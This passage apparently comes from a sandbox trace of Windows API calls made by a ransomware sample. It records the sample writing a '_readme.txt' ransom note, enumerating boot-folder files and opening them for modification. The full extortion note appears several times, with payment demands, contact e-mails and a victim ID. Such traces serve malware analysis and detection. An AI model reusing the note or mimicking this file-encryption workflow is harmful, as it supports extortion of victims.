(HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0179.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0179.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0179.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0179.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.458] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0179.458] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0179.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0179.458] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0179.458] PathFindFileNameW (pszPath="") returned="" [0179.459] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0179.459] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0179.459] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0179.459] FreeLibrary (hLibModule=0x759d0000) returned 1 [0179.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f90 | out: hHeap=0x6a0000) returned 1 [0179.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.460] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0179.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.460] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0179.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0179.460] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0179.460] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.460] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.461] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*" (normalized: "c:\\boot\\pt-pt\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.462] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.462] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.463] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned=".mui" [0179.463] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.463] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.463] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.464] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.464] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | 